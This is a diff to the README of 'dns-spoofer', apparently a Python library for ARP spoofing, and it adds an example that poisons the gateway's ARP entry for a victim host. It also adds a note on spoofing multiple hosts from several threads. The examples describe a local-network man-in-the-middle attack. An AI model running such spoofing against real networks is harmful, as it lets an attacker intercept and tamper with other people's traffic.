adw1n/dns-spoofer/README.md

 dnsspoofer.spoof_arp(b"\x01\x02\x03\x04\x05\x06",b"192.168.1.1")
 # now arp -n output on the victim machine:
 # 192.168.1.1     ether   33:33:33:33:33:33   C  em1

+# you probably also want to spoof the victim's (192.168.1.100)
+# mac address on the gateway
+dnsspoofer.spoof_arp(b"\x10\x20\x30\x40\x50\x60",b"192.168.1.100")
 ```

 #### DNS poisoning
 TODO

+#### Notes
+* dns-spoofer is releasing the GIL while doing it's magic.
+So you shouldn't have any problems with using multiple threads to
+periodically spoof multiple hosts.